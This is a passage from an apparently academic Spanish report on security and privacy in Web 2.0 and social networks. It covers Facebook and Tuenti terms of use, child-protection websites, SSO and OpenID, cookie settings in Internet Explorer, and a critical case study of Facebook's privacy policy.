web creadas por el Gobierno de España en defensa del menor en Internet.
A pesar de las clausulas abusivas que nos encontramos en las condiciones de uso y las políticas
de privacidad de algunas redes sociales existen mecanismos por parte de los gobiernos y otras
entidades para proteger nuestra información privada que más tarde conoceremos.
Vamos a analizar las condiciones de uso de las redes sociales y sus clausulas y así poder ver
cuáles de ellas favorecen a privacidad del usuario y cuáles de ellas son abusivas para el usuario.
Al crear un nuevo perfil de Facebook, la Web nos indica que tenemos que rellenar ciertos
campos obligatorios con información personal que son: Nombre, Apellidos, E-mail, Sexo y
Fecha de nacimiento.
Página 259
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Sin estos datos no es posible hacernos un perfil en la red social. ¿Y por qué? Facebook nos
dice…
Ilustración 69. Ilustración 69. Facebook. ¿Por qué tengo que dar mi fecha de nacimiento?
Podemos ocultar nuestros datos para el resto de usuarios, pero Facebook seguirá teniendo
nuestros datos reales.
Más adelante en el caso de uso referido a Facebook entraremos más en detalle en las
condiciones de uso de esta red social.
Investigando por la Web de Tuenti nos damos cuenta que tanto la política de privacidad como
los términos de uso de Tuenti están mucho menos elaborados que en Facebook.
Otros
o Creo que alguien ha accedido a mi cuenta. ¿Qué debería hacer?
o ¿Qué tipo de medidas de privacidad ofrece Tuenti?
o Creo que alguien ha creado una cuenta haciéndose pasar por mí. ¿Qué
debo hacer?
o Alguien en Tuenti ha subido fotos mías que no quiero que estén en la red.
¿Qué puedo hacer para que las eliminen?
Página 260
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Un punto a favor de Tuenti son los links externos que nos ofrece en su página de privacidad
que son los siguientes y que pueden ser muy útiles para ayudar a los usuarios a usar
correctamente las redes sociales.
Página 261
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
A nivel laboral: hoy en día cada vez más empresas a la hora de contratar a
alguien, intentan buscar su perfil de Facebook o Tuenti, para intentar
descubrir más, qué tipo de persona van a contratar. Esto podría ser un
problema si nuestro perfil es público y tenemos fotos o comentarios que
podrían dañar nuestra imagen laboral.
Social Intelligence es una empresa de monitoreo de redes sociales que ofrece a los
departamentos de Recursos Humanos un resumen de la actividad de los trabajadores así
como comportamiento en estos portales, y lo más importante, incluyendo la actividad cuándo
no se está dentro del trabajo. A pesar de esto, en Europa las leyes de protección y privacidad
de los datos son muy fuertes, tanto que en determinados países como Alemania se prohíbe a
las empresas consultar determinadas redes sociales que no sean específicas para empleo,
como LinkedIn, para tomar decisión de contratación o corporativas.
En México, las redes sociales sirvieron de instrumento para secuestradores que investigaban a
sus víctimas mediantes su datos personales para averiguar sus direcciones, quiénes son sus
amigos, imágenes que puedan mostrar su status económico interesante.
Página 262
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 263
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 264
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Unido a esto se debería formar a los usuarios, es decir, elaborar una serie de cursos de
formación sobre los riesgos de las redes sociales que se imparta en empresas, universidades y
colegios, ya que el colectivo más afectado por estas redes sociales con más riesgo son los
adolescentes.
Se deberían tomar soluciones por parte del gobierno también limitando las cesiones de los
derechos por parte de las redes sociales. Los usuarios están protegidos por determinadas
leyes en cuanto a derechos de imagen, derecho de datos de carácter personal e intelectual,
pero los gobiernos deberían limitarlos específicamente para las redes sociales aunque vaya en
contra de los términos de uso de algunas de ellas.
Otra medida a tomar sería que para este tipo de redes sociales hubiera una mayor
estandarización en lo que se refiere a programación, es decir, que se provea un código tipo
para este tipo de plataformas, evitando así fallos de seguridad y fugas de información.
En el pasado abril de 2009 Tuenti se comprometió junto a la AEPD a depurar los perfiles de
menores de 14 años, ya que estos en teoría no pueden acceder a la red social. Para ello Tuenti
escogió todos los perfiles que fueran sospechosos y pidió adjuntar una fotocopia del DNI-e
para verificar su edad en menos de 92h. El 90% de los perfiles sospechosos fueron eliminados
por no aportar ninguna documentación.
Página 265
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Imaginemos que esto es así pero para acceder a la red social necesitamos adjuntar la clave
pública de nuestro DNI-e, pasar nuestro DNI-e por un lector o adjuntar un certificado
digital de una autoridad de certificación como puede ser por ejemplo carmerfirma. De esta
manera todos los perfiles de la red serían reales, pero ¿dónde queda la privacidad? Si ya
somos perseguidos hoy en día por las empresas sin saber nuestro nombre en las redes sociales
en busca de cualquier tipo de información nuestra, si el sistema de logueo fuera así ¿cuánta
gente utilizaría facebook o Tuenti como lo hace ahora? Quizá este tipo de logueo sería más
adecuado para redes profesionales como LinkedIn.
Página 266
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
A nivel europeo, todos los años se celebra la 32ª Conferencia Internacional de Autoridades de
Protección de Datos y Privacidad58. El pasado 2010 se celebró en Jerusalén, Israel llamándose
“Privacy: Generations”. En estas conferencias se reúnen unos 37 países en total para discutir
los derechos que atañen a la privacidad de los usuarios y las personas en el mundo de Internet.
58 nd
32 International Conference of Data Protection and Privacy Commissioners, http://www.justice.gov.il/PrivacyGenerations.
59
Estándares Internacionales sobre la Protección de Datos Personales y Privacidad,
https://www.agpd.es/portalwebAGPD/canaldocumentacion/conferencias/common/pdfs/31_conferencia_internacional/estandare
s_resolucion_madrid_es.pdf
Página 267
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La Unión Europea ha creado el día llamado “Día Internacional de la Internet Segura” que es
el 9 de febrero, para concienciar a los usuarios de lo importante que es la seguridad en
Internet a través de la Web Internet Segura 2010 http://internetsegura2010.com.
También existe el “Día Europeo de Protección de Datos” el 28 de enero, como podemos ver
desde esta Web http://www.apep.es/dia-europeo-proteccion-datos/.
Decálogo del buen uso de Internet: chaval.es. Se trata de una web ofrecida por el Gobierno
de España para los hijos españoles enseñando el buen uso de las TIC (Tecnologías de la
información) mediante juegos educativos. El fin es enseñar a los niños el buen uso de Internet
y los peligros que puede conllevar de manera educativa.
La Oficina de Seguridad del Internauta, Oficina de Seguridad del Internauta, nos ayuda a
conocer los riesgos y amenazas de la red así como consejos de privacidad y legales. Se trata
de una web ofrecida por el Ministerio de Industria, Turismo y Comercio, Plan Avanza2 e
Inteco.
Página 268
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Protégeles: http://www.protegeles.com/.
Acción contra la pornografía infantil: http://www.asociacion-acpi.org/.
Chaval: http://www.chaval.es/chavales/page?p=index
Ins@fe: http://www.saferinternet.org.
Safer Internet Programme (Unión Europea):
http://ec.europa.eu/information_society/activities/sip/index_en.htm.
Página 269
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Ilustración 71. Web Seguridad 2.0 del Ministerio de Industria, Turismo y Comercio.
A modo de introducción nos dicen “Las Redes Sociales son un invento estupendo, y no tienen
porque generarnos problemas si respetamos una serie de cuestiones básicas relativas a la
seguridad y al respeto.”
Página 270
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
60
Ciberbullying o ciberacoso es el uso de información electrónica y medio de comunicación como correo electrónico, redes
sociales, blogs, mensajería instantánea, mensajes de texto, teléfonos móviles o websites difamatorios para acosar a un individuo
o grupo, mediante ataques personales u otros medios. Fuente: http://es.wikipedia.org/wiki/Ciberacoso.
61
Grooming o grooming de niños por internet es un nuevo problema relativo a la seguridad de los menores en Internet; se trata
de acciones deliberadas por parte de un adulto de cara a establecer lazos de amistad con un niño en Internet, con el objetivo de
obtener una satisfacción sexual mediante imágenes eróticas o pornográficas del menor o la preparación para un encuentro
sexual. Fuente: http://es.wikipedia.org/wiki/Grooming.
Página 271
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 272
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
2. Tu Responsabilidad. (http://www.seguridadweb20.es/tu_responsabilidad.php)
Es sección nos da a conocer los límites legales que debemos acatar para no cometer ningún
delito en la red y normas para velar por nuestra seguridad y privacidad.
“En internet no todo vale… tienes el deber de respetar los derechos de los demás.”
Recuerda que:
Internet no es anónimo.
Ser menor de edad no exime de responsabilidad, es decir, aunque seas menor eres
responsable de lo que hagas.
El desconocimiento de las leyes no exime el deber de cumplimiento de las
mismas, es decir, que no conozcas las leyes no quiere decir que no debas
cumplirlas.
Página 273
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 274
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
4. Estudio
Podemos ver un estudio realizado por Protégeles sobre el uso de las redes sociales por parte
de los menores con estadísticas y gráficos relacionados en formato pdf.
Tuenti
“PROTEGELES considera que la Red Social TUENTI es sin lugar a dudas la más segura de
cuantas se utilizan en España en la actualidad, así como la más comprometida con la
protección de sus usuarios menores de edad. Del mismo modo participa de forma proactiva
llevando a cabo acciones preventivas y formativas incluso en centros escolares.”
“La Comisión publicó el año pasado un informe sobre la aplicación de los “Principios para las
Redes Sociales más Seguras”, estudiando 25 redes sociales presentes en Europa, entre las que
se encuentra FACEBOOK.”
Youtube
“Sitio Web dedicado al intercambio de videos. Cualquier usuario de Internet puede entrar en
la página y buscar vídeos de su interés gracias al motor de búsqueda por palabras clave. Para
acceder a determinados servicios de la página es necesario crearse una cuenta gratuita y
registrarse como usuario. Los usuarios de YouTube podrán colgar sus propios videos y hacer
comentarios de los mismos.”
MySpace
“La Comisión publicó el año pasado un informe sobre la aplicación de los “Principios para las
Redes Sociales más Seguras”, estudiando 25 redes sociales presentes en Europa, entre las que
se encuentra MySpace.”
Habbo
“La Comisión publicó el año pasado un informe sobre la aplicación de los “Principios para las
Redes Sociales más Seguras”, estudiando 25 redes sociales presentes en Europa, entre las que
se encuentra HABBO.”
Second Life
“Second Life es un mundo virtual donde puedes desarrollar una segunda vida, observa que no
hemos dicho “es un juego” porque sería una forma muy pobre de describirlo. El objetivo no es
quedar primero o superar una serie de pantallas o retos, en Second Life, como su propio
nombre indica, puedes tener una segunda vida en un mundo virtual.”
Página 275
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Wikipedia
“Según la definición de la propia página, es una “enciclopedia de contenido libre que todos
pueden editar”.
Cualquier usuario de Internet puede escribir artículos, leer y/o modificar los ya publicados,
etc.… Es, por lo tanto, una enciclopedia en constante cambio y evolución. Desde su origen en
el año 2001 hasta la actualidad, se han publicado más de 11 millones de artículos en 265
idiomas.”
“Juegos Multijugador Online. Son un tipo específico de videojuegos que requieren conexión a
Internet. En ellos, el usuario se crea un personaje o avatar que debe ir moviéndose por el
mundo virtual e interactuando con otros jugadores. El objetivo es adquirir experiencia para
avanzar en los niveles del juego. Se pretende ir mejorando y superando al resto de usuarios.”
P2P
“Las redes P2P (peer to peer o red de pares) son redes en las que, a través de una serie de
nodos que se comportan como iguales entre sí, actúan como clientes o servidores
indistintamente, y podemos descargar archivos que han puesto a nuestra disposición otros
usuarios.
Esto quiere decir que nuestro ordenador está “bajando” archivos de otros ordenadores
conectados a la red pero también los está ofreciendo para su descarga a otras personas.”
En realidad esta web está muy enfocada a los padres para que conozcan el uso de la Web 2.0.
Página 276
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
14.7.2. Protégeles
La Web “Protégeles” que podemos encontrar en la siguiente dirección
http://www.protegeles.com/ se trata de una asociación sin ánimo de lucro surgida en el año
2002.
Página 277
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Líneas de denuncia
La Web ofrece diferentes líneas de ayuda: pornografía infantil, incitación al odio racial,
apología a la anorexia y bulimia, seguridad en telefonía móvil, apología al terrorismo, internet
sin acoso (ciberbullying), acoso escolar (bullying), tráfico de drogas, videosjuegos,
ciberfamilias.
Estudios
“El trabajo de PROTEGELES se centra no sólo en la localización de páginas de pornografía
infantil, la denuncia de pedófilos, etc, sino que también conlleva una importante faceta
preventiva.
PROTEGELES realiza estudios en profundidad dirigidos a identificar nuevos riesgos para los
menores.”
Página 278
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Campañas
“PROTEGELES es una organización eminentemente práctica, cuyo objetivo no es sólo la
sensibilización social y la denuncia, sino también el desarrollo de Campañas y la elaboración
de materiales didácticos específicos dirigidos hacia los menores.
Exprime la red
Apología de la anorexia y la bulimia en Internet
Cibercentro amigo.
Relaciones externas
Protégeles está en relación con varias asociaciones externas.
Página 279
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Webs de interés
También nos ofrecen un repertorio de material y Webs que ofrecen:
www.cibercentinelas.org
www.masqueunaimagen.com
www.anaymia.com
www.stop-drogas.com
www.inhope.org
www.exprimelared.com
www.asociacion-acpi.org
www.portaldelmenor.es
www.internetsegura2009.com
www.internetsinacoso.com
www.lineasdeayuda.info
www.micueva.com
www.mipisitovirtual.com
www.protegelestv.com
www.safenet2.com
www.sinacoso.es
www.stopanorexia.es
www.stop-obsesion.com
www.tecnoadicciones.com
Página 280
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
14.7.3. Insafe
Se trata de un programa de la Unión Europea para promover el internet seguro. La Web se
ubica en http://www.saferinternet.org.
También nos ofrece ayuda online (según seamos niños, padres o profesores), un repertorio de
noticias, líneas de ayuda, el día del internet seguro, Eventos, Campañas y un blog.
La Web es una versión europea de protégeles, pero está bastante peor organizada que
protégeles, debería invertir más en usabilidad para el desarrollo de esta tratándose de un
tema tan importante.
Página 281
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
14.8. Herramientas de las empresas para el control del uso de Web 2.0
Cada vez más se prohíbe el uso de las redes sociales como Facebook y Tuenti dentro de las
empresas y para facilitar la tarea, determinadas empresas han desarrollado herramientas para
el control de estos accesos.
Este tipo de herramientas no sirven sólo para que el empleado no esté distraído y mejore así
productividad, sino también para evitar posibles ataques provenientes de las Web 2.0, al ser
un entorno de colaboración tan amplio siempre tenemos más riesgos de introducir algún tipo
de malware en nuestra empresa y restringiendo algunos portales Web que no necesitemos
para trabajar también restringimos el abanico de posibilidades de ataque. Por otro lado este
tipo de políticas pueden resultar abusivas para el trabajador si no se restringen en exceso los
accesos a por tales de Internet.
Esta aplicación incluye la tecnología Check Point UserCheck involucrando a los empleados en
la toma de decisiones, ayudando así a los administradores de TI a decidir que Web 2.0 son
necesarias para las necesidades específicas de cada empresa.
La aplicación hace uso de Check Point AppWiki, que se trata de la biblioteca más amplia del
mundo con aplicaciones de Internet, redes sociales, mensajería instantánea o media
streaming.
Página 282
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Esta herramienta permite el control de más de 1.500 aplicaciones pudiendo elegir entre 13
categorías de aplicaciones como:
Mensajería instantánea
Redes sociales
P2P
Bases de datos
Correo electrónico
Transferencia de archivos
Terminales de acceso remoto
VoIP
Streaming Media
Gestión de redes
Aplicaciones de tipo túnel usadas por firewalls
Página 283
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Vamos a ver una idea de las tecnologías y aplicación que nos aportan privacidad a la Web 2.0.
Para explicar esto de manera sencilla, pensemos en que para acceder a todos nuestros sitios
Web como pueden ser Facebook, Tuenti, blogs, Myspace, Ebay, etc. necesitamos para cada
uno de ellos una cuenta creada en ese portal con una contraseña diferente, lo que hace difícil
de recordar tantos usuarios y contraseñas diferentes. Si tuviéramos un único identificador
para todos esos sitios, creado en un servidor que verifique nuestro usuario de OpenID o Single
Sign-On, que puede confirmar la identificación en los Websites que soporten este sistema de
login, todo esto facilitaría mucho las cosas a la hora de logearnos en todos nuestros sitios Web.
Página 284
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Los sistemas de autenticación por SSO, al igual que facilitan mucho las cosas el simplificar el
acceso a todas nuestras Web en un único identificador, también pueden suponer muchos
problemas de privacidad y seguridad, ya que la unión de todas las cuentas en una conlleva
riesgos. Si se ve comprometida la seguridad de nuestro ordenador personal y un atacante
malicioso obtiene nuestro usuario y password del sistema SSO podría acceder a todos
nuestros portales Web con solo tener eso. Por otro lado el que dispongamos de un solo
usuario para acceder a todas nuestras Web da qué pensar, ya que con tan sólo un identificador
se podría casi conocer todo nuestro entorno, aficiones, amigos, estilo de vida, etc. lo que
compromete seriamente la privacidad de las personas.
Esta es una iniciativa bastante innovadora, trata de unificar la autenticación SSO con la
arquitectura de clave pública que posee actualmente nuestro DNI digital. Se podría acceder a
una Web con un solo login, distribuyendo certificados digitales alojados en Smart Cards o
llaves electrónicas.
¿Podríamos pensar en un mundo en el que para hacernos nuestro propio Facebook o nuestra
propia cuenta de GMail tuviéramos que usar este sistema para autentificarnos?
Esto por un lado evitaría la falsificación de identidades en la red pero por otro lado atentaría
gravemente contra nuestra privacidad.
Página 285
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
14.9.1.2. OpenID
Open ID se trata de un sistema de autenticación para páginas Web. Es fiable, es gratis y
facilita el acceso a múltiples páginas Web. Con solo introducir el usuario de OpenID, podemos
tener un identificador global para todos nuestros accesos Web. Podemos obtener nuestro
propio OpenID accedió a su Website principal http://openid.net/de la fundación OpenID en los
Estados Unidos o desde su filian en Europa http://www.openid.es/.
Algunas páginas como Technorati han implantado este sistema en su Web, pero hoy por hoy
no tiene demasiado éxito la iniciativa.
14.9.2. Cookies
Las cookies son ficheros de texto que se almacenan en nuestro ordenador con información de
sesiones de páginas Web que visitamos. Fueron inventadas por Netscape, y en realidad, se
crearon para la cesta de la “compra virtual”.
El protocolo HTTP no tiene ningún tipo de mecanismo para guardar información de sesiones o
configuraciones de las Webs por sí mismo, por lo que o bien los datos aparecen en la url de la
Web, como por ejemplo http://www.prueba.com/...../usuario&contraseña o bien
se guardan los datos de sesión y otras configuraciones mediante cookies.
A través de las Webs se almacena información en nuestro equipo para que en posteriores
ocasiones, la Web pueda recuperar esta información si es necesario.
Página 286
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
VENTAJAS
Por un lado, sirven a las Web para diferenciar a los usuarios así poder actuar de diferente
forma según el usuario.
Facilitar la identificación en sitios web. El usuario una vez que accede a una Web por primera
vez, las siguientes veces no tendrá que introducir siempre su usuario y contraseña, si él lo
desea.
Otra ventaja es el poder personalizar los portales Web mediante configuraciones a nivel de
interfaz y funcional.
DESVENTAJAS
Las cookies se usan para hacer seguimiento de los usuarios en una Web para mantener
estadísticas de uso. Ese seguimiento en ocasiones se hace para creación de bases de datos de
información sobre perfiles de usuarios por parte de las empresas de publicidad. Las empresas
almacenan los gustos de los usuarios para poder así luego spamearles con todo tipo de
publicidad que se asemeje a esos gustos.
Muchas empresas de publicidad, usan spyware para así obtener información sobre los hábitos
de navegación de los usuarios.
Página 287
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Existen algunas falsas afirmaciones que hemos recogido de Internet acerca de lo que hacen o
son las cookies y que no son del todo ciertas. Veamos algunas de ellas:
Página 288
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
14.9.3.1. Cookies
Vamos a ver como configurar la seguridad de nuestro navegador para obtener la máxima
privacidad con las cookies. Lo haremos a través de Internet Explorer ya que es el navegador
más utilizado hoy día, en el resto de navegadores se configura de manera muy similar.
Para determinados sitios webs, como pueden ser foros por ejemplos o blogs, necesitaremos
guardar cookies para poder interactuar con este tipo de webs por lo que nos pedirán
probablemente un nivel medio de seguridad.
Página 289
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Es probable que para un portal 2.0 sea difícil acceder a nuestros archivos temporales de
internet o nuestro historial de navegación, pero si lo hace, podría recoger información sobre
nuestros gustos y bombardearnos con campañas publicitarias mediantes spam o con anuncios
en la red social, o lo que es peor nos podríamos ver involucrados en un ataque de phishing.
Vamos a ver cómo eliminar el historial de navegación y los archivos temporales desde el
navegador Internet Explorer.
Página 290
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Al igual que con las cookies, iremos al menú Herramientas, Opciones de Internet y en la
primera pestaña General vemos que tenemos la opción de eliminar el Historial de exploración.
Página 291
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 292
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 15
Casos de uso
15.1. Introducción
Vamos hacer un estudio sobre los ejemplos clave en el desarrollo de las redes sociales
centrándonos en las Web 2.0 con más poder en Internet hoy en día. Hemos elegido como
ejemplos Facebook y Twitter.
Página 293
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
15.2. Facebook
15.2.1. Introducción
Facebook ha cambiado la forma de uso de Internet de determinadas personas, han cambiado
sus hábitos.
Ha crecido en usuarios hasta llegar a más de 500 millones de usuarios. Si pensamos que el
primer país más poblado es China con más de 1.300 millones de habitantes y el segundo es la
India con más de 1.100 millones de habitantes, situaríamos a Facebook en el tercer país más
poblado del mundo con más 500 millones de habitantes al que le sigue Estados Unidos con
más de 300 millones de habitantes.
Página 294
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Según Alexa.com Facebook es la segunda página más visitada en el mundo entero seguida de
Google que tiene el primer puesto en número de visitas
http://www.alexa.com/siteinfo/facebook.com.
Página 295
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Es una red social gratuita, que requiere de registro. Para registrarse se necesitan datos
personales obligatorios que son nombre, apellidos, cuenta de correo electrónico, sexo y fecha
de nacimiento.
15.2.3. Historia
La red nación en febrero de 2004 en Estados Unidos y fue creada por Mark Zuckerberg en la
Universidad de Harvard. La idea fue crear una Web en la que la gente compartiera sus gustos
y sentimientos con sus amigos.
En octubre de 2007 se vendió un 1,6% de la red a Microsoft por 240 millones de dólares, con la
idea de que Facebook fuera un modelo de negocio para ellos.
La última inversión de capital potente fue liderada por Greylock Venture Capital por 27,5
millones de dólares socio de Howard Cox que pertenece al fondo de inversión en capital riesgo
de la CIA.
En el año 2007 salieron las versiones de la red social en los idiomas francés, español y alemán.
A día de hoy cuenta con 500 millones de usuarios y está traducida a 70 idiomas. Las
previsiones según su creador es que la red social alcance el millón de usuarios de 3 a 5 años.
México alcanza hoy día el primer puesto con 12,5 millones de usuarios, es decir un 2,5%.
En el pasado 2010 salió al cine la película de “The Social Network” o en español La Red Social
que relata el nacimiento y el desarrollo del nacimiento de Facebook desde Hardward hasta su
expansión a nivel mundial. La película está basada en el libro “Multimillonarios por accidente”
(The Accidental Billionaries: The founding of Facebook, A Table of Sex, Money, Genius and
Betrayal) escrito por Ben Mezrich. En la película se narra la historia clásica de ambición y
poder por parte del personaje que imita a Mark Zuckerberg y el fundador de Napster Sean
Página 296
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Parker. La película ha creado muchas críticas acerca del joven más rico del mundo, Mark
Zuckerberg.
15.2.4. Tecnología
La API de Facebook se trata de una de las mejores APIs que existen en las redes sociales pero
su implementación es tan cerrada que la utilidad es prácticamente nula.
Se compone de XML, FQL y JavaScript. Para poder usar la API se requiere que el usuario sea
de Facebook.
15.2.5. Críticas
Facebook es muy criticado por la gran cantidad de personas que están entrando en la red. Al
firmar los términos de uso permitimos que todos nuestros datos sean propiedad de los
Estados Unidos, por lo que hay gente que afirma que es una base de datos gigantesca que le
sirve de soporte a las empresas de publicidad o la CIA, actuando como un instrumento de
manipulación a nivel global.
Otro aspecto de crítica son sus abusivas políticas de privacidad, ya que cedemos todos
nuestros datos a la red, tanto nuestros datos personales como fotografías, videos, páginas a
las que nos asociamos, etc. Cedemos la propiedad exclusiva y perpetua de toda la información
que incluyamos en la red social pudiendo usar esos datos como desee la red. Si deseamos
eliminar nuestro perfil de Facebook podemos hacerlo, pero la red no nos asegura que esa
información vaya ser borrada de manera inmediata, nuestros datos pueden permanecer en los
servidores de Facebook el tiempo que ellos deseen.
No solo esto, sino que está permitida la entrada en la red a menores de edad que pueden
verse afectados psicológicamente por la red, y si vamos más allá pueden verse involucrados
en casos de pornografía infantil o acoso.
Página 297
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Evolución de la privacidad
La evolución de la privacidad en Facebook desde que la Web se creó hace 6 años ha sido
creciente. Ahora encontramos muchas más configuraciones de privacidad, que son muy útiles
a la hora de proteger nuestros datos. A partir del año 2010 podemos configurar de manera
exhaustiva nuestro perfil.
Página 298
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 299
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 300
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 301
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Al crear un nuevo perfil de Facebook, la Web nos indica que tenemos que rellenar ciertos
campos obligatorios con información personal que son: Nombre, Apellidos, E-mail, Sexo y
Fecha de nacimiento.
Podemos ocultar nuestros datos para el resto de usuarios, pero Facebook seguirá teniendo
nuestros datos reales.
Página 302
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Como vemos Facebook ofrece gran cantidad de recursos relacionados con la privacidad.
Como este tema atañe a los 600.000 usuarios que componen hoy día Facebook, la Web
http://www.profilewatch.org nos permite puntuar nuestro nivel de privacidad.
Para ver nuestra puntuación de privacidad del 0 al 10, accedemos a nuestro perfil de Facebook
y hacemos clic en Perfil, como nos indica la Web.
Una vez hecho esto copiamos la url arriba indicada del perfil, y la introducimos en la Web y
hacemos clic en Check Profile.
En principio no es posible ver la privacidad de nuestros amigos a menos que conozcamos la url
de su perfil.
Página 303
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Algo interesante que nos muestra la Web es la puntuación del perfil de Mark Zuckerberg que
curiosamente es un 0,7 sobre 10.
Parece ser que el rey de las redes sociales no se preocupa mucho por la privacidad de su perfil
o lo que parece más normal, que el uso de su perfil lo hará de una manera más corporativa que
orientado a los amigos.
Página 304
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
ReclaimPrivacy
Otra Web también dedicada a medir la privacidad de nuestro Facebook es
www.reclaimprivacy.org. Nos permite analizar nuestro perfil de Facebook desde ella
dándonos estadísticas de cómo se encuentra nuestra privacidad en la red actualmente.
Para escanear nuestra privacidad en Facebook desde la Web deberemos seguir los siguientes
pasos:
Accedemos a la Web oficial www.reclaimprivacy.org.
Una vez dentro el link Scan for Privacy, lo arrastramos hasta la barra de favoritos.
Accedemos a las opciones de privacidad de nuestro Facebook,
http://www.facebook.com/settings/?tab=privacy&ref=mb.
Una vez que accedemos a las opciones de privacidad le damos al link Scan for Privacy
y veremos que la aplicación nos hará un escaneo completo de nuestra privacidad.
Una vez que realiza el análisis de nuestro perfil nos va diciendo la partes de nuestro Facebook
que son seguras y las que no.
Página 305
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
POLÍTICA DE PRIVACIDAD
Para ver la política de Privacidad de Facebook accederemos a la Web http://es-
la.facebook.com/policy.php.
1. Introducción.
2. Información que recibimos.
3. Compartir información en Facebook.
4. Información que compartes con terceros.
5. Cómo utilizamos tu información.
6. Cómo compartimos información.
7. Cómo puedes cambiar o eliminar información.
8. Cómo protegemos la información.
9. Otros términos.
Podemos destacar los siguientes puntos de la política de privacidad, subrayando los puntos
más importantes.
El término donde más se excede el portal de Facebook sea el punto “8. Cómo protegemos la
información” ya que a pesar de decirnos que tienen medidas de seguridad en sus servidores
para proteger la información no se hacen responsables de que un ataque intencionado se
haga con ellos.
Página 306
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
1. Introducción
Página 307
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 308
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 309
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 310
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
de otro tipo), podemos limitar el uso de funciones del sitio Web en respuesta
a posibles signos de abuso, podemos eliminar contenido inadecuado o
enlaces a contenido ilegal, y podemos suspender o desactivar cuentas por si
hubiera violaciones de nuestra Declaración de derechos y responsabilidades.
Página 311
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Términos de uso
Para ver las condiciones de uso de la Web lo podemos hacer desde
http://www.facebook.com/terms.php.
Página 312
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Vamos a destacar los puntos a favor y en contra más importantes del contrato que firmamos
cuando hacemos clic en Registrar.
Puntos en contra
Veamos el siguiente punto de la declaración:
Esto quiere decir que por motivos comerciales podrían obligarnos a cambiar de nombre de
usuario; por un lado es correcto ya que así no se promueve la venta de cuentas de Facebook
Página 313
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
con palabras clave como se hace con los dominios Web, pero por otro lado es algo abusivo que
Facebook pueda eliminar nuestro nombre de usuario cuando ellos lo deseen.
Se entiende que ellos te pueden copiar la aplicación que tú has desarrollado de manera
completamente gratuita, ¿hasta dónde llega el límite de “similar”?.
Parece que nuestro nombre de usuario y foto de perfil son de “dominio público” por lo que nos
comentan en este punto de la declaración.
11. 11. Podríamos rechazar o retirar cualquier anuncio por cualquier motivo.
Vemos que en el punto 11 se podría llegar a retirar un anuncio “por cualquier motivo”, ya no si
es ilícito o no cumple alguna de las declaraciones de los términos de uso, sino sin razón
ninguna podrían llegar a retirarse los anuncios.
En el punto “14. Terminación” nos dice que podemos darnos de baja cuando lo deseemos
pero que ciertas disposiciones siguen vigentes.
Página 314
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
14. Terminación
8.2. Nos das permiso para utilizar y permitir a otras personas utilizar dichos
enlaces y el contenido en Facebook.
Respecto al punto “15. Conflictos”, parece ser uno de los puntos más conflictivos ya que todo
el punto está escrito en mayúsculas. Nos comentan que cualquier demanda que surja se
deberá resolver en el tribunal estatal del condado de Santa Clara, dirigiendo las leyes de
California, EEUU la declaración.
Veamos el punto 15.3, escrito entero en mayúsculas por ser uno de los más importantes, sino
el que más.
15. Conflictos
Página 315
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
